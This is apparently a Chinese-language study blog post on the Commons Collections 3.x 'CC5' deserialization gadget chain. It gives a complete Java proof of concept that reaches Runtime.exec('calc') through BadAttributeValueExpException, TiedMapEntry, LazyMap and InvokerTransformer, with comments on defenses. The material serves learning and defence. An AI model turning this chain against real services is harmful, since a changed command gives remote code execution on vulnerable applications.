后面确实学了这么多了,觉得能比较看得懂了,直接放一张CC5的调用图吧:
直接从入口来讲吧:
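BadAttributeValueExpException.readObject 会对反序列化出来的 valObj 调用 toString,所以只要让 valObj(即 val 字段)是 TiedMapEntry,就会走到 TiedMapEntry.toString。需要注意的是,BadAttributeValueExpException 的构造函数本身就会对传入的非空对象调用 toString 并只保存得到的字符串,因此下面的代码在实例化时传入 null,再通过反射把 val 字段设置为 TiedMapEntry。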
之后TiedMapEntry.toString --> TiedMapEntry.getValue --> LazyMap.get。再往后一路都比较熟悉就不说了。直接贴代码了:
- package org.example;
-
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.keyvalue.TiedMapEntry;
- import org.apache.commons.collections.map.LazyMap;
-
- import javax.management.BadAttributeValueExpException;
- import java.io.*;
- import java.lang.reflect.Field;
- import java.util.HashMap;
- import java.util.Map;
-
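/**
 * Local demonstration of the "CC5" gadget chain in Commons Collections 3.x.
 *
 * <p>The class builds an object graph, writes it to {@code ser.bin} and reads it back.
 * The call path during the read is:
 * {@code BadAttributeValueExpException.readObject} -> {@code TiedMapEntry.toString}
 * -> {@code TiedMapEntry.getValue} -> {@code LazyMap.get} -> {@code ChainedTransformer.transform}.
 *
 * <p>Points a defender should take from it:
 * <ul>
 *   <li>The chain runs inside {@code readObject()}, before the caller receives the object, so
 *       casting or type-checking the returned value afterwards does not prevent it.</li>
 *   <li>Code that must read Java-serialized data from an untrusted source should install an
 *       allow-list {@code ObjectInputFilter} on the stream (JEP 290) or switch to a data-only
 *       format; {@link #unserialize(String)} below deliberately has no filter.</li>
 *   <li>Commons Collections 3.2.2 and later refuse to (de)serialize {@code InvokerTransformer}
 *       unless that is explicitly re-enabled, which breaks this chain at its last link.</li>
 *   <li>Serialized streams that carry the class name
 *       {@code org.apache.commons.collections.functors.InvokerTransformer} are a useful
 *       detection signal at network or log level.</li>
 * </ul>
 */
public class CC5 {
    /** File the demo writes the serialized object to and then reads back. */
    private static final String SER_FILE = "ser.bin";

    /**
     * Builds the object graph, serializes it and immediately deserializes it again.
     *
     * @param args unused
     * @throws Exception on reflection or I/O failure
     */
    public static void main(String[] args) throws Exception {
        // Transformer pipeline: each element is applied to the result of the previous one.
        Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        // LazyMap calls its factory transformer from get() when the requested key is absent.
        HashMap<Object, Object> backingMap = new HashMap<>();
        Map lazyMap = LazyMap.decorate(backingMap, chainedTransformer);
        // TiedMapEntry.toString() -> getValue() -> lazyMap.get("key").
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "key");

        // Constructed with null: the constructor calls toString() on a non-null argument and
        // keeps only the resulting String, so the entry is placed in the field by reflection.
        BadAttributeValueExpException carrier = new BadAttributeValueExpException(null);
        Field valField = BadAttributeValueExpException.class.getDeclaredField("val");
        valField.setAccessible(true);
        valField.set(carrier, tiedMapEntry);

        serialize(carrier);
        // NOTE(review): in the JDK 8 sources readObject() calls toString() on the field only
        // when no SecurityManager is installed; confirm against the JDK in use.
        unserialize(SER_FILE);
    }

    /**
     * Writes {@code obj} to {@code ser.bin} using Java native serialization.
     *
     * @param obj object to serialize
     * @throws IOException if the file cannot be written
     */
    public static void serialize(Object obj) throws IOException {
        // try-with-resources flushes and closes the stream even when writeObject throws.
        try (ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(SER_FILE))) {
            out.writeObject(obj);
        }
    }

    /**
     * Reads one object from the given file using Java native deserialization.
     *
     * <p>No {@code ObjectInputFilter} is set, so every class on the classpath may be
     * instantiated; this is what the demo relies on and what production code must not do
     * with data it does not control.
     *
     * @param Filename path of the file to read
     * @return the deserialized object
     * @throws IOException if the file cannot be read
     * @throws ClassNotFoundException if a class in the stream is not on the classpath
     */
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new FileInputStream(Filename))) {
            return in.readObject();
        }
    }
}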